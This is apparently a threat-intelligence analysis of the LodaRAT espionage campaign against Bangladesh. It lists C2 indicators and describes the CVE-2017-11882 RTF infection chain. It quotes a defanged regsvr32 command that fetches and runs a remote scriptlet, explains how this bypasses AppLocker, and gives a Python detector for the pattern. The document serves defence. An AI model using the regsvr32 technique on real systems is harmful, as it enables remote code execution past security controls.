LodaRAT is linked to a specific campaign against Bangladesh.
Kasablanka (LodaRAT) appears to be motivated by information gathering and espionage rather than direct financial gain.
Talos has identified activity beginning in October 2020 that is still in progress and currently targets both the Windows and Android platforms. info.v-pn[.]co was first observed in use as Loda's C2 on July 2, 2020, the same day the domain was registered. Since that date the host has been used for Loda-related malicious activity and has resolved to several different IPs over the past seven months.
The Windows version uses the IP 107.172.30[.]213 as its staging site, which hosts the first-stage script and the main payload.
For this campaign, the threat actors initially used the IP address 160.178.220[.]194 as the hosting site for both the C2 and the Android version, and later changed the C2 to info.v-pn[.]co.
Based on the certificate fingerprints used to sign the two Android samples, we believe the C2 was recently changed to info.v-pn[.]co and that the malware is currently being distributed from a new domain, lap-top[.]xyz.
A development version signed with the same certificate (using the internal RFC 1918 address 192.168.1.169 as its C2) was submitted anonymously to VirusTotal from the same geographic area of Morocco as the geolocation of the IP used in the early stages of the campaign (160.178.220[.]194). This suggests that the developers of Loda4Android may be located in Morocco.
The attackers use a malicious RTF document that exploits CVE-2017-11882 to download a malicious SCT file.
The files analyzed during this investigation did not use any obfuscation. The exploit's payload is in plain text and can be inspected easily.
The second stage of the infection chain reuses a technique Loda has employed before. As shown above, the payload runs the following command:
regsvr32 /s /u /n /i:hxxp://107[.]172[.]30[.]
This is a well-known Windows technique that bypasses AppLocker by abusing the regsvr32 command: the /i: argument is handed to DllInstall, so an attacker can download and execute an SCT scriptlet through a signed, trusted Microsoft binary while AppLocker rules are never consulted.
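The following detection logic is an added example, not code from the original report or from Talos: it classifies Sysmon-style process-creation events for the regsvr32 pattern shown above (a remote or .sct argument to /i:, the /n flag that suppresses DllRegisterServer, and a parent of EQNEDT32.EXE as in the CVE-2017-11882 chain). The sample events, the example.invalid URL and the file names are constructed for the demo.

```python
import re

# Constructed Sysmon-style process-creation events (ParentImage, Image, CommandLine).
# Sample data made up for this example; not taken from the original report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s /u /n /i:http://example.invalid/stage2.sct"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /n /i:C:\Users\Public\run.sct"},
]

REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
INSTALL_ARG = re.compile(r"(?:^|\s)/i:(\S+)", re.IGNORECASE)   # /i:<arg> is passed to DllInstall
NOREG_FLAG = re.compile(r"(?:^|\s)/n(?:\s|$)", re.IGNORECASE)  # /n skips DllRegisterServer

def classify_regsvr32(event):
    """Return the reasons a regsvr32 event matches the AppLocker-bypass pattern
    described above; an empty list means nothing suspicious was found."""
    if not event["image"].lower().endswith("regsvr32.exe"):
        return []
    cmd = event["cmdline"]
    reasons = []
    m = INSTALL_ARG.search(cmd)
    if m:
        arg = m.group(1).strip('"')
        if REMOTE_URL.match(arg):
            reasons.append("remote /i: argument")        # code fetched over the network
        if arg.lower().endswith(".sct"):
            reasons.append(".sct scriptlet as /i: argument")
        if NOREG_FLAG.search(cmd):
            reasons.append("/n with /i: (only DllInstall runs)")
    if event["parent"].lower().endswith("eqnedt32.exe"):
        reasons.append("spawned by Equation Editor (CVE-2017-11882 chain)")
    return reasons

def flag_events(events):
    """Map event index -> reasons for every event that triggers at least one rule."""
    flagged = {}
    for i, e in enumerate(events):
        reasons = classify_regsvr32(e)
        if reasons:
            flagged[i] = reasons
    return flagged

if __name__ == "__main__":
    for i, reasons in flag_events(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", "; ".join(reasons))
```

The benign registration of a local DLL (second event) is not flagged; the local .sct variant is flagged on the scriptlet and /n rules alone, since not every abuse fetches its payload remotely.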